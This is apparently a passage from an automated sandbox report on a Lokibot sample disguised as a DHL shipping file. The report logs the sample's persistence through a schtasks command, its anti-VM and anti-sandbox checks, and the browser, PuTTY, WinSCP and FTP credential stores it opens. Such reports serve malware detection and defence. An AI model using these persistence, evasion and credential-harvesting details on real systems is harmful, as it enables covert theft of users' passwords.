              Source: initial sampleStatic PE information: section name: .text entropy: 7.59320889202
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile created: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exeJump to dropped file

              Boot Survival:

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000000.00000002.233842339.0000000003379000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL FILE 267382.exe PID: 6600, type: MEMORY
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exe TID: 6604Thread sleep time: -41500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exe TID: 6620Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exe TID: 6712Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: VMWARE
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]3_2_0040317B
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,3_2_00402B7C
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'Jump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess created: C:\Users\user\Desktop\DHL FILE 267382.exe {path}Jump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeQueries volume information: C:\Users\user\Desktop\DHL FILE 267382.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00406069 GetUserNameW,3_2_00406069
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL FILE 267382.exe PID: 6600, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL FILE 267382.exe PID: 6708, type: MEMORY
              Source: Yara matchFile source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings